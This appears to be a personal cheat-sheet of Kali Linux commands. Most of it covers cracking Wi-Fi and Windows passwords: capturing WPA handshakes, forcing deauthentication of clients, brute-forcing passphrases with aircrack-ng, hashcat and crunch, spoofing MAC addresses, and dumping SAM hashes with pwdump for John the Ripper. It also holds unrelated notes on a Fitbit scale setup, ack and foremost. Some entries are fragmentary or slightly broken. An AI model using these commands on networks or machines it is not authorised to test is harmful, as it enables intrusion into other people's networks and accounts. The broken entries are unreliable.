Create Hashcat capture file
aircrack-ng -J /root/any_name TARGET-01.cap
hashcat -m 2500 -a 3 /root/any_name.hccap ?d?d?D
-m = type of hash, 2500 is for wpa/wpa2
-a = type of attack, 3 is brute force
Start monitor Mode:
airmon-ng start wlan0
Show list of available wireless networks, copy channel, name and mac address:
Start capturing packets of target network:
airodump-ng -c CHANNEL -w WIFINAME —bssid TARGETMACADDRESS wlan0mon
force handshake while running airodump-ng:
aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon
Stop monitor mode:
airmon-ng stop wlan0
service network-manager restart
crack passphrase using a dictionary:
aircrack-ng -w /usr/share/wordlists/more_than_8.txt TARGET-01.cap
crack passphrase using crush:
crunch 8 10 abcdefghijklmnopqrstuvwxyz | aircrack-ng -e [ESSID] -w – [file path to the .cap file]
8 10 = 8 to 10 characters
abcdefghijklmnopqrstuvwxyz = password will be all lower case no numbers or characters.
show current mac address of network adapter:
macchanger -s wlan0
turn on/off network adapter:
ifconfig wlan0 up/down
Change Mac address
set random mac address :
macchanger -r wlan0
set manual mac address :
macchanger -m AA:AA:AA:AA:AA:AA
set random vendor MAC of the same kind:
macchanger -a wlan0
set random vendor MAC of any kind:
macchanger -A wlan0
print known vendors:
@bootup = every time the machine reboots or starts.
ack “type the text that you are looking for”
this will return the file location and name. Install ack if not installed. Raspbian does not include it you have to install it. sudo apt-get install ack
- Go to http://www.fitbit.com/scale/setup/start , click “Get started”
- Log in to your fitbit account, name your aria and type your initials.
- Remove battery for about 10 to 12 seconds, put it back on. Put cover quickly, do this until you see “SET UP ACTIVE” in the scale, click continue.
- Connect to Aria’s own wireless network, click continue.
- Select your 2.4 Ghz wireless network, enter password.
- Connect back to your network.
- Sucess, the scale should say something like “joining” then a check mark.
- Send me a greenshirt 🙂
Crack Windows 10 password using John the ripper in Kali
- cd to /Media/root/Windows/System32/config (path might be different)
- run “pwdump SYSTEM SAM > /root/Desktop/hashes.txt
- cd /Desktop/hashes.txt
- run “john -format=n2 -users=my_username123 hashes.txt
option -t is for type, -t all will recover all types.
foremost -t all -v -i /dev/sdb1 -o /root/Desktop/MyFolder1